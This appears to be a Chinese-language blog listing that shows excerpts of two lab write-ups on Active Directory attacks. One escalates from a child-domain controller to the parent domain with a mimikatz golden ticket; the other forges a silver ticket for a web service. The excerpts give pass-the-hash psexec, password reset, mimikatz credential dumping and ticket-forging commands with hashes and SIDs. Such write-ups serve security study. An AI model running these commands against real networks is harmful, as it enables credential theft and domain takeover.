發表文章

目前顯示的是有「Mimikatz」標籤的文章

Challenge 8 - Poseidon(2)

圖片
 Challenge 8 - Poseidon(2) 目前三台電腦已拿下第三台子網域的 Member Server 以及第二台的子網域 Domain Controller 的 Domain Admins 帳號 administrator 下一步是朝向主網域的第一台 Domain Controller 參考這一篇文章 :  https://cryptex.blog/posts/childtoea/ 簡單一句話就是如果已經入侵到了子網域的 DC,那麼就可以拿下整個父域 手法是透過子網域的 krbtgt HASH 值與父域的 Enterprise Admin SID 透過 minikatz 製作黃金票證獲取 Enterprise Admin 事前準備工作需要的內容  - 子網域的 KRBTGT HASH 值  - 子網域中目標用戶的名稱  - 子網域的 FQDN  - Root Domain 的 Enterprise Admins 群組的 SID  - mimikatz 工具  - PowerView.ps1 模組 先使用之前獲取的子網域 Domain Admins 帳號 administrator 的 HASH 登入到子網域 DC impacket-psexec -hashes :3bcdd818f7ec942ac91aa30d8db71927 administrator@192.168.232.162 然後修改 administrator 的密碼為 Oscp#1234,net user administrator Oscp#1234 匯入 PowerView.ps1 然後輸入 Get-ADTrust -Filter * 查看現有的 Trust 機制 使用 AD 管理工具一樣可以看到信任關係 看的出來是雙向信任的關係 也可以使用此指令查看,([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() 都顯示 "bidirectional",表示是雙向信任的關係 子網域的 SID,Get-DomainSID,S-1-5-21-4168247447-17...

Active Directory 身分驗證攻擊 (2)

圖片
 Active Directory 身分驗證攻擊 (2) Silver Tickets 使用 jeff / HenchmanPutridBonbon11 登入 Client75 後使用 iwr 搭配 -UseDefaultCredentials  存取 web04,指令 iwr -UseDefaultCredentials http://web04 出現 401 - Unauthorized: Access is denied due to invalid credentials. 創建銀票要三個資訊 1. SPN 密碼 Hash 2. 網域 SID 3. 目標服務的 SPN 使用管理員權限啟動 mimikatz.exe 啟動 debug mode "privilege::debug" 接著輸入 sekurlsa::logonpasswords 來提取快取的 AD 憑證 第一個是服務 iis_service SPN 密碼 Hash 如下圖 4d28cf5252d39971419580a51484ca09 第二個是網域 SID,直接使用 whoami /user 去掉尾碼的 1105 就是我們要的網域 SID S-1-5-21-1987370270-658905905-1781884369 第三個是 SPN,使用之前手動枚舉學過的 setspn -L iis_service 查找 SPN : HTTP/web04.corp.com 三個資訊都有了 1. SPN 密碼 Hash : 4d28cf5252d39971419580a51484ca09 2. 網域 SID : S-1-5-21-1987370270-658905905-1781884369 3. 目標服務的 SPN : HTTP/web04.corp.com 接著透過 mimikatz 創建使用者 jeffadmin 的銀票 指令 kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a514...